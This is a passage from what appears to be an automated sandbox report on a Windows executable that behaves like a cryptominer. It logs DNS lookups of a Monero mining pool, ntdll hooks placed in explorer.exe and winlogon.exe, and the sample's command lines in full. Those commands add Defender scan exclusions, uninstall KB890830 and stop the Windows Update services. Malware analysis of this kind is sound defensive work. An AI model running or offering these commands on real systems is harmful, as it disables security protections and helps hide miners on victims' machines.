                                                            .pdata0x5460000x1980x200d2f019686ca09662fd14bcc140313ab3False0.529296875data3.617058043954178IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .00cfg0x5470000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .tls0x5480000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x5490000x3900x4000dd02af6ec781894019ac3fdb5cbf63fFalse0.384765625data2.998554535660332IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x54a0000x780x200a39919fdf7b33c1123ed7bed1fd77ddeFalse0.23828125data1.4899261113070796IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0x5490600x32cdataEnglishUnited States0.4396551724137931

                                                            Imports

                                                            DLLImport
                                                            msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strcat, strcpy, strlen, strncmp, strstr, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                                            KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-11-05T10:37:17.785545+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449732TCP
                                                            2024-11-05T10:37:55.685944+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449743TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 5, 2024 10:37:09.467694998 CET4973020128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:09.472522974 CET2012849730149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:09.472673893 CET4973020128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:09.473253965 CET4973020128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:09.478008986 CET2012849730149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:10.307693958 CET2012849730149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:10.307708025 CET2012849730149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:10.307893991 CET4973020128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:10.308640003 CET4973020128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:10.313621998 CET2012849730149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:10.553097963 CET2012849730149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:10.553464890 CET4973020128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:10.558835030 CET2012849730149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:10.558952093 CET4973020128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:15.817433119 CET4973120128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:15.822480917 CET2012849731149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:15.822721958 CET4973120128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:15.851244926 CET4973120128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:15.856241941 CET2012849731149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:16.668716908 CET2012849731149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:16.668778896 CET2012849731149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:16.668853045 CET4973120128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:16.669686079 CET4973120128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:16.674494028 CET2012849731149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:16.919234991 CET2012849731149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:16.919536114 CET4973120128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:16.925376892 CET2012849731149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:16.925491095 CET4973120128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:22.911165953 CET4973820128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:23.088505030 CET2012849738149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:23.088625908 CET4973820128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:23.088949919 CET4973820128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:23.094141006 CET2012849738149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:23.980767965 CET2012849738149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:23.983985901 CET2012849738149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:23.984086990 CET4973820128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:23.984430075 CET4973820128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:23.992966890 CET2012849738149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:24.541112900 CET2012849738149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:24.541147947 CET2012849738149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:24.541250944 CET4973820128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:24.541498899 CET4973820128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:24.547560930 CET2012849738149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:24.547626019 CET4973820128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:29.989242077 CET4973920128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:29.994184971 CET2012849739149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:29.994282007 CET4973920128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:30.116938114 CET4973920128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:30.121833086 CET2012849739149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:30.841434956 CET2012849739149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:30.841451883 CET2012849739149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:30.841546059 CET4973920128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:30.855716944 CET4973920128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:30.860594988 CET2012849739149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:31.107234001 CET2012849739149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:31.107501030 CET4973920128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:31.114449978 CET2012849739149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:31.114501953 CET4973920128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:36.141599894 CET4974020128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:36.247950077 CET2012849740149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:36.248100042 CET4974020128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:36.248404980 CET4974020128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:36.253392935 CET2012849740149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:37.107094049 CET2012849740149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:37.107110977 CET2012849740149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:37.107261896 CET4974020128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:37.108139038 CET4974020128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:37.112967968 CET2012849740149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:37.360203981 CET2012849740149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:37.360733986 CET4974020128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:37.366327047 CET2012849740149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:37.366379023 CET4974020128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:43.304574966 CET4974120128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:43.309643030 CET2012849741149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:43.309734106 CET4974120128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:43.310022116 CET4974120128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:43.314879894 CET2012849741149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:44.323301077 CET2012849741149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:44.323333979 CET2012849741149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:44.323473930 CET4974120128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:44.324184895 CET4974120128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:44.329101086 CET2012849741149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:44.580940962 CET2012849741149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:44.581242085 CET4974120128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:44.587064981 CET2012849741149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:44.587133884 CET4974120128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:50.394979954 CET4974220128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:50.402395964 CET2012849742149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:50.402483940 CET4974220128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:50.407356024 CET4974220128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:50.412224054 CET2012849742149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:51.240696907 CET2012849742149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:51.240714073 CET2012849742149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:51.240957022 CET4974220128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:51.241704941 CET4974220128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:51.246504068 CET2012849742149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:51.486263990 CET2012849742149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:51.486682892 CET4974220128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:51.492271900 CET2012849742149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:51.492338896 CET4974220128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:57.443234921 CET4974420128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:57.448436975 CET2012849744149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:57.448573112 CET4974420128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:57.762588024 CET4974420128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:57.768481016 CET2012849744149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:58.304040909 CET2012849744149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:58.304079056 CET2012849744149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:58.304122925 CET4974420128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:58.305911064 CET4974420128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:58.310756922 CET2012849744149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:58.557528019 CET2012849744149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:58.557777882 CET4974420128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:37:58.564243078 CET2012849744149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:37:58.564294100 CET4974420128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:38:03.900326014 CET4976620128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:38:03.905210972 CET2012849766149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:38:03.905304909 CET4976620128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:38:03.967004061 CET4976620128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:38:03.972054958 CET2012849766149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:38:04.742722034 CET2012849766149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:38:04.743407011 CET2012849766149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:38:04.743500948 CET4976620128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:38:04.744548082 CET4976620128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:38:04.749452114 CET2012849766149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:38:04.988579988 CET2012849766149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:38:04.988830090 CET4976620128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:38:04.993963003 CET2012849766149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:38:04.994019032 CET4976620128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:38:10.098014116 CET4979220128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:38:10.103010893 CET2012849792149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:38:10.103086948 CET4979220128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:38:10.113595009 CET4979220128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:38:10.118407965 CET2012849792149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:38:10.948334932 CET2012849792149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:38:10.948368073 CET2012849792149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:38:10.948417902 CET4979220128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:38:10.949085951 CET4979220128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:38:10.953871965 CET2012849792149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:38:11.198445082 CET2012849792149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:38:11.198717117 CET4979220128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:38:11.204147100 CET2012849792149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:38:11.204212904 CET4979220128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:39:20.931541920 CET4981820128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:39:20.937122107 CET2012849818149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:39:20.937195063 CET4981820128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:39:20.937367916 CET4981820128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:39:20.942728043 CET2012849818149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:39:21.817821026 CET2012849818149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:39:21.817857027 CET2012849818149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:39:21.817960978 CET4981820128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:39:21.818566084 CET4981820128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:39:21.823471069 CET2012849818149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:39:22.446432114 CET2012849818149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:39:22.446705103 CET4981820128192.168.2.4149.102.143.109
                                                            Nov 5, 2024 10:39:22.451788902 CET2012849818149.102.143.109192.168.2.4
                                                            Nov 5, 2024 10:39:22.451881886 CET4981820128192.168.2.4149.102.143.109

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 5, 2024 10:37:09.455450058 CET5113553192.168.2.41.1.1.1
                                                            Nov 5, 2024 10:37:09.463340044 CET53511351.1.1.1192.168.2.4

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 5, 2024 10:37:09.455450058 CET192.168.2.41.1.1.10xbba1Standard query (0)gulf.moneroocean.streamA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 5, 2024 10:37:09.463340044 CET1.1.1.1192.168.2.40xbba1No error (0)gulf.moneroocean.streammonerooceans.streamCNAME (Canonical name)IN (0x0001)false
                                                            Nov 5, 2024 10:37:09.463340044 CET1.1.1.1192.168.2.40xbba1No error (0)monerooceans.stream149.102.143.109A (IP address)IN (0x0001)false

                                                            Code Manipulations

                                                            User Modules

                                                            Hook Summary

                                                            Function NameHook TypeActive in Processes
                                                            ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                            NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                            ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                            NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                            ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                            NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                            NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                            ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                            ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                            NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                            RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                            NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                            NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                            ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                            ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                                            Processes

                                                            Process: explorer.exe, Module: ntdll.dll
                                                            Function NameHook TypeNew Data
                                                            ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                            NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                            ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                            NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                            ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                            NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                            NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                            ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                            ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                            NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                            RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                            NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                            NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                            ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                            ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                            Process: winlogon.exe, Module: ntdll.dll
                                                            Function NameHook TypeNew Data
                                                            ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                            NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                            ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                            NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                            ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                            NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                            NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                            ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                            ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                            NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                            RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                            NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                            NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                            ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                            ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:04:36:58
                                                            Start date:05/11/2024
                                                            Path:C:\Users\user\Desktop\file.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                            Imagebase:0x7ff6cc420000
                                                            File size:5'511'168 bytes
                                                            MD5 hash:FB788C569D7B0ACF5546340AA85CD0A6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:1
                                                            Start time:04:36:59
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:04:36:59
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                            Imagebase:0x7ff767cb0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\wusa.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                            Imagebase:0x7ff62b220000
                                                            File size:345'088 bytes
                                                            MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop bits
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

